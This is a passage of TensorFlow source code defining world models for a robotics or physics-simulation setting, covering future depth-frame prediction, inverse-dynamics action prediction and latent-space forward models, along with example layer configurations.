            bypass = cfg['hidden'][i].get('bypass')
            if bypass:
                bypass_node = nodes_for_bypass[bypass]
                m.add_bypass(bypass_node)
            nf = cfg['hidden'][i]['num_features']
            my_activation = cfg['hidden'][i].get('activation')
            if my_activation is None:
                my_activation = activation
            if train:
                my_dropout = cfg['hidden'][i].get('dropout')
            else:
                # never apply dropout at test time
                my_dropout = None
            m.fc(nf, init = 'xavier', activation = my_activation, bias = .01, stddev = stddev, dropout = my_dropout)
            nodes_for_bypass.append(m.output)
            print(m.output.get_shape().as_list())
    return m.output
def flatten_append_unflatten(start_state, action, cfg, m):
    """Flatten state and action, concat them, run the MLP from cfg['mlp'],
    then reshape the result back to [-1] + cfg['reshape_dims']."""
    state_flat = flatten(start_state)
    act_flat = flatten(action)
    combined = tf_concat([state_flat, act_flat], 1)
    mlp_out = hidden_loop_with_bypasses(combined, m, cfg['mlp'], reuse_weights = False, train = True)
    target_dims = cfg['reshape_dims']
    # NOTE(review): assumes prod(target_dims) matches the MLP output width.
    return tf.reshape(mlp_out, [-1] + target_dims)
class DepthFuturePredictionWorldModel():
    """Forward model: predict the next depth frame from past depths + action.

    Builds a TF graph: conv-encode the given frames (time flattened into
    channels), join with the action via ``action_state_join_model``, deconv
    back to image space, and take (half) squared error vs. the last future
    frame as the loss.
    """
    def __init__(self, cfg, action_state_join_model = flatten_append_unflatten):
        # cfg keys used: 'state_shape', 'batch_size', 'action_shape', 'encode',
        # 'action_join', 'deconv', optional 'per_sample_normalization'.
        print('Warning! dropout train/test not currently being handled.')
        with tf.variable_scope('wm'):
            #state shape gives the state of one shape. The 'states' variable has an extra timestep, which it cuts up into the given and future states.
            states_shape = list(cfg['state_shape'])
            states_shape[0] += 1
            #Knowing the batch size is not truly needed, but until we need this to be adaptive, might as well keep it
            #The fix involves getting shape information to deconv
            bs = cfg['batch_size']
            self.states = tf.placeholder(tf.float32, [bs] + states_shape)
            # split into given frames (all but last) and future frames (all but first)
            self.s_i = x = self.states[:, :-1]
            self.s_f = s_f = self.states[:, 1:]
            self.action = tf.placeholder(tf.float32, [bs] + cfg['action_shape'])
            #convert from 3-channel encoding
            self.processed_input = x = postprocess_depths(x)
            s_f = postprocess_depths(s_f)
            #flatten time dim into channels
            x = tf_concat([x[:, i] for i in range(cfg['state_shape'][0])], 3)
            #encode
            m = ConvNetwithBypasses(**kwargs) if False else ConvNetwithBypasses()
            all_encoding_layers = feedforward_conv_loop(x, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = False, batch_normalize = False, no_nonlinearity_end = False)
            x = all_encoding_layers[-1]
            joined = action_state_join_model(x, self.action, cfg['action_join'], m)
            # decode back to image space; encoder layers available as bypasses
            decoding = deconv_loop(
                joined, m, cfg['deconv'], desc='deconv',
                bypass_nodes = all_encoding_layers, reuse_weights = False,
                batch_normalize = False,
                do_print = True)
            self.pred = decoding[-1]
            # target is only the final future frame
            self.tv = s_f[:, -1]
            diff = self.pred - self.tv
            diff = flatten(diff)
            per_sample_norm = cfg.get('per_sample_normalization')
            if per_sample_norm == 'reduce_mean':
                self.loss_per_example = tf.reduce_mean(diff * diff / 2., axis = 1)
            else:
                self.loss_per_example = tf.reduce_sum(diff * diff / 2., axis = 1)
            self.loss = tf.reduce_mean(self.loss_per_example)
            #self.loss = tf.nn.l2_loss(self.tv - self.pred) #bs #(bs * np.prod(cfg['state_shape']))
# Small example configuration for DepthFuturePredictionWorldModel:
# two-frame state, 3-layer conv encoder mirrored by a 3-layer deconv decoder,
# and a 2-layer MLP that merges the action into the latent (reshaped 8x8x5).
sample_depth_future_cfg = {
    'state_shape' : [2, 64, 64, 3],
    'action_shape' : [2, 8],
    'action_join' : {
        # spatial dims the MLP output is reshaped to before the deconv stack
        'reshape_dims' : [8, 8, 5],
        'mlp' : {
            'hidden_depth' : 2,
            'hidden' : {
                1 : {'num_features' : 320, 'dropout' : .75},
                2 : {'num_features' : 320, 'activation' : 'identity'}
            }
        }
    },
    'encode' : {
        'encode_depth' : 3,
        'encode' : {
            1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}},
            2 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}},
            3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
        }
    },
    'deconv' : {
        'deconv_depth' : 3,
        'deconv' : {
            # 'bypass' : 0 pulls the stack's input as a skip connection
            1 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}, 'bypass' : 0},
            2 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}, 'bypass' : 0},
            3 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 1}, 'bypass' : 0}
        }
    }
}
# Larger variant of sample_depth_future_cfg: deeper (5-layer) encoder/decoder
# with skip connections into earlier encoder layers, and a 3-layer action MLP.
a_bigger_depth_future_config = {
    'state_shape' : [2, 64, 64, 3],
    'action_shape' : [2, 8],
    'action_join' : {
        # spatial dims the MLP output is reshaped to before the deconv stack
        'reshape_dims' : [8, 8, 5],
        'mlp' : {
            'hidden_depth' : 3,
            'hidden' : {
                1 : {'num_features' : 320},
                2 : {'num_features' : 320},
                3 : {'num_features' : 320, 'activation' : 'identity'}
            }
        }
    },
    'encode' : {
        'encode_depth' : 5,
        'encode' : {
            1 : {'conv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 20}},
            2 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}},
            3 : {'conv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 20}},
            4 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 10}},
            5 : {'conv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 5}},
        }
    },
    'deconv' : {
        'deconv_depth' : 5,
        'deconv' : {
            # 'bypass' : k wires in the k-th encoder layer as a skip connection
            1 : {'deconv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 20}, 'bypass' : 4},
            2 : {'deconv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}, 'bypass' : 3},
            3 : {'deconv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 20}, 'bypass' : 2},
            4 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}, 'bypass' : 1},
            5 : {'deconv' : {'filter_size' : 5, 'stride' : 1, 'num_filters' : 1}, 'bypass' : 0}
        }
    }
}
class ActionModel(object):
    """Inverse-dynamics model: predict the action linking two state stacks.

    Encodes the initial and final frame stacks with a weight-shared conv
    encoder, concatenates the flat encodings (optionally with the last given
    action), and regresses the target action with an MLP under l2 loss.
    """
    def __init__(self, cfg):
        states_shape = list(cfg['state_shape'])
        states_shape[0] += 1
        self.states = tf.placeholder(tf.float32, [None] + states_shape)
        # given frames vs. shifted-by-one future frames
        self.s_i = s_i = self.states[:, :-1]
        self.s_f = s_f = self.states[:, 1:]
        self.action = tf.placeholder(tf.float32, [None] + cfg['action_shape'])
        self.action_post = tf.placeholder(tf.float32, [None] + cfg['action_shape'])
        last_action = self.action[:, 0]
        # target: the final action in the post sequence
        tv_action = self.action_post[:, -1]
        #encode: flatten time into channels, then normalize pixel values
        s_i = tf_concat([s_i[:, i] for i in range(cfg['state_shape'][0])], 3)
        s_f = tf_concat([s_f[:, i] for i in range(cfg['state_shape'][0])], 3)
        s_i = postprocess_std(s_i)
        s_f = postprocess_std(s_f)
        m = ConvNetwithBypasses()
        with tf.variable_scope('encode_model'):
            s_i = feedforward_conv_loop(s_i, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = False, batch_normalize = False, no_nonlinearity_end = False)[-1]
            # second pass reuses the same encoder weights
            s_f = feedforward_conv_loop(s_f, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = True, batch_normalize = False, no_nonlinearity_end = False)[-1]
        #action mlp
        enc_i_flat = flatten(s_i)
        enc_f_flat = flatten(s_f)
        if cfg['action_model'].get('include_last_action'):
            to_concat = [enc_i_flat, enc_f_flat, last_action]
        else:
            to_concat = [enc_i_flat, enc_f_flat]
        enc_in = tf_concat(to_concat, 1)
        self.act_pred = hidden_loop_with_bypasses(enc_in, m, cfg['action_model']['mlp'], reuse_weights = False, train = True)
        #loss
        loss_factor = cfg['action_model'].get('loss_factor', 1.)
        self.act_loss = tf.nn.l2_loss(self.act_pred - tv_action) * loss_factor
def get_action_model(inputs, cfg, reuse_weights = False):
    """Build the inverse-dynamics ('action') model graph and its loss.

    Args:
        inputs: dict with tensors 's_i', 's_f' (state stacks whose axis 1 is
            time, length cfg['state_shape'][0]), 'act_given' (axis 1 must be
            length 1) and 'act_tv' (target action).
        cfg: config with 'state_shape', 'encode' and 'action_model' entries.
        reuse_weights: reuse previously created encoder/MLP variables (used
            when this graph is instantiated for several timesteps).

    Returns:
        dict with 'act_loss_per_example', 'act_loss', and 'pred'.
    """
    s_i, s_f, act_given, act_tv = inputs['s_i'], inputs['s_f'], inputs['act_given'], inputs['act_tv']
    time_len = cfg['state_shape'][0]
    assert time_len == s_i.get_shape().as_list()[1] and time_len == s_f.get_shape().as_list()[1]
    # flatten the time dimension into channels, then normalize pixels
    s_i = tf_concat([s_i[:, i] for i in range(time_len)], 3)
    s_f = tf_concat([s_f[:, i] for i in range(time_len)], 3)
    s_i = postprocess_std(s_i)
    s_f = postprocess_std(s_f)
    m = ConvNetwithBypasses()
    #encode — both states share encoder weights (second call always reuses)
    with tf.variable_scope('encode_model'):
        encoding_i = feedforward_conv_loop(s_i, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = reuse_weights, batch_normalize = False, no_nonlinearity_end = False)[-1]
        encoding_f = feedforward_conv_loop(s_f, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = True, batch_normalize = False, no_nonlinearity_end = False)[-1]
    enc_i_flat = flatten(encoding_i)
    enc_f_flat = flatten(encoding_f)
    # optional per-state MLP before concatenation
    if 'mlp_before_concat' in cfg['action_model']:
        with tf.variable_scope('before_action'):
            enc_i_flat = hidden_loop_with_bypasses(enc_i_flat, m, cfg['action_model']['mlp_before_concat'], reuse_weights = reuse_weights, train = True)
            enc_f_flat = hidden_loop_with_bypasses(enc_f_flat, m, cfg['action_model']['mlp_before_concat'], reuse_weights = True, train = True)
    assert act_given.get_shape().as_list()[1] == 1
    act_given = act_given[:, 0]
    x = tf_concat([enc_i_flat, enc_f_flat, act_given], 1)
    with tf.variable_scope('action_model'):
        x = hidden_loop_with_bypasses(x, m, cfg['action_model']['mlp'], reuse_weights = reuse_weights, train = True)
    # loss_func returns (loss_per_example, scalar_loss)
    lpe, loss = cfg['action_model']['loss_func'](act_tv, x, cfg['action_model'])
    return {'act_loss_per_example' : lpe, 'act_loss' : loss, 'pred' : x}
def l2_loss_per_example(tv, pred, cfg):
    """Half squared-error per example (scaled by cfg['loss_factor'], default 1.)
    plus its batch mean. The per-example tensor keeps a singleton second axis."""
    residual = tv - pred
    scale = cfg.get('loss_factor', 1.)
    per_example = tf.reduce_sum(residual * residual, axis = 1, keep_dims = True) / 2. * scale
    return per_example, tf.reduce_mean(per_example)
class MoreInfoActionWorldModel(object):
    """Multi-timestep inverse-dynamics model with shared encoders.

    For each of ``num_timesteps`` offsets, encodes the required frame stacks
    (each stack concatenates frames at ``state_steps`` offsets), concatenates
    the chosen encodings with given actions, and predicts the target action
    with a weight-shared MLP. Also builds 'object there' readout statistics
    based on the force component of the target action.
    """
    def __init__(self, cfg):
        #placeholder setup
        num_timesteps = cfg['num_timesteps']
        image_shape = list(cfg['image_shape'])
        state_steps = list(cfg['state_steps'])
        states_given = list(cfg['states_given'])
        actions_given = list(cfg['actions_given'])
        act_dim = cfg['act_dim']
        # extra frames needed before/after the prediction window
        t_back = - (min(state_steps) + min(states_given))
        t_forward = max(state_steps) + max(states_given)
        states_shape = [num_timesteps + t_back + t_forward] + image_shape
        self.states = tf.placeholder(tf.uint8, [None] + states_shape)
        states_cast = tf.cast(self.states, tf.float32)
        postprocess_method = cfg.get('postprocess')
        if postprocess_method == 'depths1':
            states_cast = postprocess_depths(states_cast)
        elif postprocess_method == 'images1':
            states_cast = postprocess_std(states_cast)
        else:
            assert postprocess_method is None
        acts_shape = [num_timesteps + max(max(actions_given), 0) - min(actions_given), act_dim]
        self.action = tf.placeholder(tf.float32, [None] + acts_shape)#could actually be smaller for action prediction, but for a more general task keep the same size
        self.action_post = tf.placeholder(tf.float32, [None] + acts_shape)
        act_back = - min(actions_given)
        if cfg.get('include_obj_there', False):
            # external per-timestep object-presence labels
            self.obj_there_via_msg = tf.placeholder(tf.int64, [None, acts_shape[0]], name = 'obj_there_via_msg')
        #things we gotta fill in
        self.act_loss_per_example = []
        self.act_pred = []
        #start your engines
        m = ConvNetwithBypasses()
        #concat states at all timesteps needed
        states_collected = {}
        #this could be more general, for now all timesteps tested on are adjacent, but one could imagine this changing...
        for t in range(num_timesteps):
            for s in states_given:
                if t + s not in states_collected:
                    states_collected[t+s] = tf_concat([states_cast[:, t + s + i + t_back] for i in state_steps], axis = 3)
        #a handle for uncertainty modeling. should probably do this in a more general way.
        um_begin_idx, um_end_idx = cfg.get('um_state_idxs', (1, 3))
        um_act_idx = cfg.get('um_act_idx', 2)
        self.s_i = self.states[:, um_begin_idx:um_end_idx]
        self.action_for_um = self.action[:, um_act_idx]
        if cfg.get('include_obj_there', False):
            self.obj_there_supervision = self.obj_there_via_msg[:,cfg.get('obj_there_supervision_idx', 2)]
            print('in moreinfo wm')
            print(self.obj_there_supervision)
        #good job. now encode each state
        reuse_weights = False
        flat_encodings = {}
        flat_encodings_no_mlp = {}
        # NOTE: py2-only dict iteration; iteration order is arbitrary but
        # variable reuse makes the graph identical regardless of order.
        for s, collected_state in states_collected.iteritems():
            with tf.variable_scope('encode_model'):
                encoding = feedforward_conv_loop(collected_state, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = reuse_weights, batch_normalize = False, no_nonlinearity_end = False)[-1]
                flat_encodings_no_mlp[s] = encoding
                enc_flat = flatten(encoding)
                if 'mlp_before_concat' in cfg['action_model']:
                    with tf.variable_scope('before_action'):
                        enc_flat = hidden_loop_with_bypasses(enc_flat, m, cfg['action_model']['mlp_before_concat'], reuse_weights = reuse_weights, train = True)
                flat_encodings[s] = enc_flat
            #reuse weights after first time doing computation
            reuse_weights = True
        #just hardcode this for now
        #assuming that the timestep before the action corresponds to states_given[1]
        self.encoding_for_um = flat_encodings_no_mlp[states_given[1]]
        #great. now let's make our predictions and count our losses
        act_loss_list = []
        acc_01_list = []
        reuse_weights = False
        for t in range(num_timesteps):
            encoded_states_given = [flat_encodings[t + s] for s in states_given]
            act_given = [self.action[:, t + a + act_back] for a in actions_given]
            act_tv = self.action_post[:, t + act_back]
            x = tf_concat(encoded_states_given + act_given, axis = 1)
            with tf.variable_scope('action_model'):
                pred = hidden_loop_with_bypasses(x, m, cfg['action_model']['mlp'], reuse_weights = reuse_weights, train = True)
            lpe, loss = cfg['action_model']['loss_func'](act_tv, pred, cfg['action_model'])
            acc_01 = binned_01_accuracy_per_example(act_tv, pred, cfg['action_model'])
            reuse_weights = True
            acc_01_list.append(tf.cast(acc_01, tf.float32))
            self.act_loss_per_example.append(lpe)
            self.act_pred.append(pred)
            act_loss_list.append(loss)
        if cfg.get('norepeat', False):
            self.act_loss = act_loss_list[0]
        else:
            self.act_loss = tf.reduce_mean(act_loss_list)
        # variable partitions for separate optimizers / freezing
        self.act_var_list = [var for var in tf.global_variables() if 'action_model' in var.name or 'before_action' in var.name]
        self.encode_var_list = [var for var in tf.global_variables() if 'encode_model' in var.name]
        #adding on readouts
        self.obj_there_loss = []
        self.num_obj_there = []
        self.obj_not_there_loss = []
        self.object_there = []
        obj_there_per_dim_list = []
        avg_acc_obj_there = []
        avg_acc_obj_not_there = []
        for t in range(num_timesteps):
            act_tv = self.action_post[:, t + act_back]
            # nonzero force components (dims 2:) indicate an object was acted on
            force_norm = tf.reduce_sum(act_tv[:, 2:] * act_tv[:, 2:], axis = 1, keep_dims = True)
            obj_there = tf.cast(tf.greater(force_norm, .0001), tf.float32)
            obj_there_per_dim = tf.tile(obj_there, [1, act_dim])
            obj_there_per_dim_list.append(obj_there_per_dim)
            # avg_acc_obj_there.append(tf.reduce_sum(obj_there_per_dim * acc_01_list[t], axis = 0) / tf.reduce_sum(obj_there))
            # avg_acc_obj_not_there.append(tf.reduce_sum((1. - obj_there_per_dim) * acc_01_list[t], axis = 0) / tf.reduce_sum(1. - obj_there))
            # self.obj_there_loss.append(tf.reduce_sum(obj_there * self.act_loss_per_example[t]) / tf.reduce_sum(obj_there))
            # self.obj_not_there_loss.append(tf.reduce_sum((1. - obj_there) * self.act_loss_per_example[t]) / tf.reduce_sum(1. - obj_there))
            self.num_obj_there.append(tf.reduce_sum(obj_there))
            self.object_there.append(obj_there)
        # averages over all timesteps, weighted by object presence/absence
        avg_acc_obj_there = sum([tf.reduce_sum(obj_there_per_dim_list[t] * acc_01_list[t], axis = 0)\
                for t in range(num_timesteps)]) / sum([tf.reduce_sum(self.object_there[t]) for t in range(num_timesteps)])
        avg_acc_obj_not_there = sum([tf.reduce_sum((1. - obj_there_per_dim_list[t]) * acc_01_list[t], axis = 0)\
                for t in range(num_timesteps)]) / sum([tf.reduce_sum(1. - self.object_there[t]) for t in range(num_timesteps)])
        self.obj_there_loss = sum([tf.reduce_sum(self.object_there[t] * self.act_loss_per_example[t], axis = 0)\
                for t in range(num_timesteps)]) / sum([tf.reduce_sum(self.object_there[t]) for t in range(num_timesteps)])
        self.obj_not_there_loss = sum([tf.reduce_sum((1. - self.object_there[t]) * self.act_loss_per_example[t], axis = 0)\
                for t in range(num_timesteps)]) / sum([tf.reduce_sum(1. - self.object_there[t]) for t in range(num_timesteps)])
        self.readouts = {'act_pred' : self.act_pred, 'act_loss' : self.act_loss,
                'obj_there_loss_noprint' : self.obj_there_loss, 'obj_not_there_loss_noprint' : self.obj_not_there_loss,
                'num_obj_there_noprint' : self.num_obj_there, 'acc_obj_there_noprint' : avg_acc_obj_there,
                'acc_obj_not_there_noprint' : avg_acc_obj_not_there}
        self.save_to_gfs = ['act_pred']
class LatentMoreInfoActionWorldModel(object):
    """Inverse-dynamics model plus a latent-space forward ('future') model.

    Like MoreInfoActionWorldModel, but additionally predicts the (pre-MLP)
    flat encoding of a future state from earlier encodings and actions, with
    the target l2-normalized and rescaled by sqrt(encoding_dim).

    Fixes vs. original:
      * the non-norepeat future-loss branch assigned ``self.act_loss`` instead
        of ``self.fut_loss`` (clobbering the action loss and leaving
        ``self.fut_loss`` unset, which broke ``self.readouts``);
      * ``dict.items()`` instead of py2-only ``dict.iteritems()``.
    """
    def __init__(self, cfg):
        #placeholder setup
        num_timesteps = cfg['num_timesteps']
        image_shape = list(cfg['image_shape'])
        state_steps = list(cfg['state_steps'])
        states_given = list(cfg['states_given'])
        actions_given = list(cfg['actions_given'])
        fm_states_given = list(cfg['fm_states_given'])
        fm_actions_given = list(cfg['fm_actions_given'])
        act_dim = cfg['act_dim']
        # extra frames needed before/after the prediction window
        t_back = - (min(state_steps) + min(states_given))
        t_forward = max(state_steps) + max(states_given)
        states_shape = [num_timesteps + t_back + t_forward] + image_shape
        self.states = tf.placeholder(tf.uint8, [None] + states_shape)
        states_cast = tf.cast(self.states, tf.float32)
        postprocess_method = cfg.get('postprocess')
        if postprocess_method == 'depths1':
            states_cast = postprocess_depths(states_cast)
        elif postprocess_method == 'images1':
            states_cast = postprocess_std(states_cast)
        else:
            assert postprocess_method is None
        acts_shape = [num_timesteps + max(max(actions_given), 0) - min(actions_given), act_dim]
        self.action = tf.placeholder(tf.float32, [None] + acts_shape)#could actually be smaller for action prediction, but for a more general task keep the same size
        self.action_post = tf.placeholder(tf.float32, [None] + acts_shape)
        act_back = - min(actions_given)
        #things we gotta fill in
        self.act_loss_per_example = []
        self.act_pred = []
        self.fut_loss_per_example = []
        self.fut_pred = []
        #start your engines
        m = ConvNetwithBypasses()
        #concat states at all timesteps needed
        states_collected = {}
        #this could be more general, for now all timesteps tested on are adjacent, but one could imagine this changing...
        for t in range(num_timesteps):
            print('Timestep ' + str(t))
            for s in states_given:
                if t + s not in states_collected:
                    print('State ' + str(s))
                    print('Images ' + str([t + s + i + t_back for i in state_steps]))
                    states_collected[t+s] = tf_concat([states_cast[:, t + s + i + t_back] for i in state_steps], axis = 3)
        #a handle for uncertainty modeling. should probably do this in a more general way. might be broken as-is!
        um_begin_idx, um_end_idx = cfg.get('um_state_idxs', (1, 3))
        um_act_idx = cfg.get('um_act_idx', 2)
        self.s_i = self.states[:, um_begin_idx:um_end_idx]
        self.action_for_um = self.action[:, um_act_idx]
        #good job. now encode each state
        reuse_weights = False
        flat_encodings = {}
        flat_encodings_pre_mlp = {}
        # iteration order is arbitrary, but variable reuse makes the graph
        # identical regardless of order
        for s, collected_state in states_collected.items():
            with tf.variable_scope('encode_model'):
                encoding = feedforward_conv_loop(collected_state, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = reuse_weights, batch_normalize = False, no_nonlinearity_end = False)[-1]
                enc_flat = flatten(encoding)
                flat_encodings_pre_mlp[s] = enc_flat
                if 'mlp_before_concat' in cfg['action_model']:
                    with tf.variable_scope('before_action'):
                        enc_flat = hidden_loop_with_bypasses(enc_flat, m, cfg['action_model']['mlp_before_concat'], reuse_weights = reuse_weights, train = True)
                flat_encodings[s] = enc_flat
            #reuse weights after first time doing computation
            reuse_weights = True
        # assumes the timestep before the action corresponds to states_given[1]
        self.encoding_for_um = flat_encodings_pre_mlp[states_given[1]]
        #great. now let's make our action predictions and count our losses
        act_loss_list = []
        acc_01_list = []
        reuse_weights = False
        for t in range(num_timesteps):
            encoded_states_given = [flat_encodings[t + s] for s in states_given]
            act_given = [self.action[:, t + a + act_back] for a in actions_given]
            act_tv = self.action_post[:, t + act_back]
            x = tf_concat(encoded_states_given + act_given, axis = 1)
            with tf.variable_scope('action_model'):
                pred = hidden_loop_with_bypasses(x, m, cfg['action_model']['mlp'], reuse_weights = reuse_weights, train = True)
            lpe, loss = cfg['action_model']['loss_func'](act_tv, pred, cfg['action_model'])
            acc_01 = binned_01_accuracy_per_example(act_tv, pred, cfg['action_model'])
            acc_01_list.append(tf.cast(acc_01, tf.float32))
            reuse_weights = True
            self.act_loss_per_example.append(lpe)
            self.act_pred.append(pred)
            act_loss_list.append(loss)
        if cfg.get('norepeat', False):
            self.act_loss = act_loss_list[0]
        else:
            self.act_loss = tf.reduce_mean(act_loss_list)
        # variable partitions for separate optimizers / freezing
        self.act_var_list = [var for var in tf.global_variables() if 'action_model' in var.name or 'before_action' in var.name]
        self.encode_var_list = [var for var in tf.global_variables() if 'encode_model' in var.name]
        #super. now for the latent-space future model.
        fut_loss_list = []
        reuse_weights = False
        for t in range(num_timesteps):
            encoded_states_given = [flat_encodings_pre_mlp[t + s] for s in fm_states_given]
            act_given = [self.action[:, t + a + act_back] for a in fm_actions_given]
            # target: the pre-MLP encoding of the current timestep
            fut_tv = flat_encodings_pre_mlp[t]
            x = tf_concat(encoded_states_given + act_given, axis = 1)
            with tf.variable_scope('future_model'):
                pred = hidden_loop_with_bypasses(x, m, cfg['future_model']['mlp'], reuse_weights = reuse_weights, train = True)
            print('sizes')
            print(pred)
            # l2-normalize the target and rescale so its norm is sqrt(dim)
            encoding_dim = fut_tv.get_shape().as_list()[-1]
            normalized_fut_tv = np.sqrt(encoding_dim) * tf.nn.l2_normalize(fut_tv, dim = 1)
            lpe, loss = cfg['future_model']['loss_func'](normalized_fut_tv, pred, cfg['future_model'])
            reuse_weights = True
            self.fut_loss_per_example.append(lpe)
            self.fut_pred.append(pred)
            fut_loss_list.append(loss)
        if cfg.get('norepeat', True):
            self.fut_loss = fut_loss_list[0]
        else:
            # BUGFIX: was ``self.act_loss = ...``, which overwrote the action
            # loss and left self.fut_loss undefined for the readouts below.
            self.fut_loss = tf.reduce_mean(fut_loss_list)
        self.fut_var_list = [var for var in tf.global_variables() if 'future_model' in var.name]
        #adding on readouts
        self.obj_there_loss = []
        self.num_obj_there = []
        self.obj_not_there_loss = []
        self.object_there = []
        obj_there_per_dim_list = []
        avg_acc_obj_there = []
        avg_acc_obj_not_there = []
        for t in range(num_timesteps):
            act_tv = self.action_post[:, t + act_back]
            # nonzero force components (dims 2:) indicate an object was acted on
            force_norm = tf.reduce_sum(act_tv[:, 2:] * act_tv[:, 2:], axis = 1, keep_dims = True)
            obj_there = tf.cast(tf.greater(force_norm, .0001), tf.float32)
            obj_there_per_dim = tf.tile(obj_there, [1, act_dim])
            obj_there_per_dim_list.append(obj_there_per_dim)
            self.num_obj_there.append(tf.reduce_sum(obj_there))
            self.object_there.append(obj_there)
        # averages over all timesteps, weighted by object presence/absence
        avg_acc_obj_there = sum([tf.reduce_sum(obj_there_per_dim_list[t] * acc_01_list[t], axis = 0)\
                for t in range(num_timesteps)]) / sum([tf.reduce_sum(self.object_there[t]) for t in range(num_timesteps)])
        avg_acc_obj_not_there = sum([tf.reduce_sum((1. - obj_there_per_dim_list[t]) * acc_01_list[t], axis = 0)\
                for t in range(num_timesteps)]) / sum([tf.reduce_sum(1. - self.object_there[t]) for t in range(num_timesteps)])
        self.obj_there_loss = sum([tf.reduce_sum(self.object_there[t] * self.act_loss_per_example[t], axis = 0)\
                for t in range(num_timesteps)]) / sum([tf.reduce_sum(self.object_there[t]) for t in range(num_timesteps)])
        self.obj_not_there_loss = sum([tf.reduce_sum((1. - self.object_there[t]) * self.act_loss_per_example[t], axis = 0)\
                for t in range(num_timesteps)]) / sum([tf.reduce_sum(1. - self.object_there[t]) for t in range(num_timesteps)])
        obj_there_fut_loss = sum([tf.reduce_sum(self.object_there[t] * self.fut_loss_per_example[t], axis = 0)\
                for t in range(num_timesteps)]) / sum([tf.reduce_sum(self.object_there[t]) for t in range(num_timesteps)])
        obj_not_there_fut_loss = sum([tf.reduce_sum((1. - self.object_there[t]) * self.fut_loss_per_example[t], axis = 0)\
                for t in range(num_timesteps)]) / sum([tf.reduce_sum(1. - self.object_there[t]) for t in range(num_timesteps)])
        self.readouts = {'act_pred' : self.act_pred, 'act_loss' : self.act_loss, 'fut_loss' : self.fut_loss,
                'obj_there_loss_noprint' : self.obj_there_loss, 'obj_not_there_loss_noprint' : self.obj_not_there_loss,
                'num_obj_there_noprint' : self.num_obj_there, 'acc_obj_there_noprint' : avg_acc_obj_there,
                'acc_obj_not_there_noprint' : avg_acc_obj_not_there, 'obj_there_fut_loss_noprint' : obj_there_fut_loss,
                'obj_not_there_fut_loss_noprint' : obj_not_there_fut_loss
                }
        self.save_to_gfs = ['act_pred']
class MSActionWorldModel(object):
    """Multi-step wrapper around get_action_model.

    Builds one inverse-dynamics graph per timestep offset, sharing weights
    after the first instantiation, and averages the per-step losses.
    """
    def __init__(self, cfg):
        num_timesteps = cfg['num_timesteps']
        state_shape = list(cfg['state_shape'])
        act_dim = cfg['act_dim']
        t_per_state = state_shape[0]
        # enough frames/actions for every sliding window of length t_per_state
        states_shape = [num_timesteps + t_per_state] + state_shape[1:]
        acts_shape = [num_timesteps + t_per_state - 1, act_dim]
        self.states = tf.placeholder(tf.float32, [None] + states_shape)
        self.action = tf.placeholder(tf.float32, [None] + acts_shape)
        self.action_post = tf.placeholder(tf.float32, [None] + acts_shape)
        self.act_loss_per_example = []
        self.act_pred = []
        act_loss_list = []
        for t in range(num_timesteps):
            # initial window at offset t, final window shifted by one frame
            s_i = self.states[:, t: t + t_per_state]
            if t == 0:
                self.s_i = s_i
            s_f = self.states[:, t + 1 : t + 1 + t_per_state]
            act_given = self.action[:, t : t + t_per_state - 1]
            act_tv = self.action_post[:, t + t_per_state - 1]
            inputs = {'s_i' : s_i, 's_f' : s_f, 'act_given' : act_given, 'act_tv' : act_tv}
            # reuse encoder/MLP weights after the first step
            outputs = get_action_model(inputs, cfg, reuse_weights = (t > 0))
            self.act_loss_per_example.append(outputs['act_loss_per_example'])
            act_loss_list.append(outputs['act_loss'])
            self.act_pred.append(outputs['pred'])
        self.act_loss = tf.reduce_mean(act_loss_list)
        # variable partitions for separate optimizers / freezing
        self.act_var_list = [var for var in tf.global_variables() if 'action_model' in var.name or 'before_action' in var.name]
        self.encode_var_list = [var for var in tf.global_variables() if 'encode_model' in var.name]
class LatentSpaceWorldModel(object):
    """World model operating in a learned latent space.

    Encodes given (s_i) and future (s_f) frame stacks with a shared conv
    encoder, then trains two heads:
      * 'action_model': inverse dynamics, predicting the action from
        (enc(s_i), enc(s_f)), with an L2 or softmax loss per cfg;
      * 'future_model': forward dynamics, predicting enc(s_f) (or a deconv
        decoding of it) from (enc(s_i), action), with a per-example L2 loss.
    Exposes per-example and mean losses plus per-submodule variable lists.
    """
    def __init__(self, cfg):
        #states shape has one more timestep, because we have given and future times, shoved into gpu once, and then we cut it up
        states_shape = list(cfg['state_shape'])
        states_shape[0] += 1
        self.states = tf.placeholder(tf.float32, [None] + states_shape)
        self.s_i = s_i = self.states[:, :-1]  # given frames
        self.s_f = s_f = self.states[:, 1:]   # future frames (shifted by one)
        self.action = tf.placeholder(tf.float32, [None] + cfg['action_shape'])
        self.encode_var_list = []
        self.action_post = tf.placeholder(tf.float32, [None] + cfg['action_shape'])
        #flatten out time dim
        s_i = tf_concat([s_i[:, i] for i in range(cfg['state_shape'][0])], 3)
        s_f = tf_concat([s_f[:, i] for i in range(cfg['state_shape'][0])], 3)
        s_i = postprocess_std(s_i)
        s_f = postprocess_std(s_f)
        m = ConvNetwithBypasses()
        # shared encoder: the second call reuses the weights created by the first
        with tf.variable_scope('encode_model'):
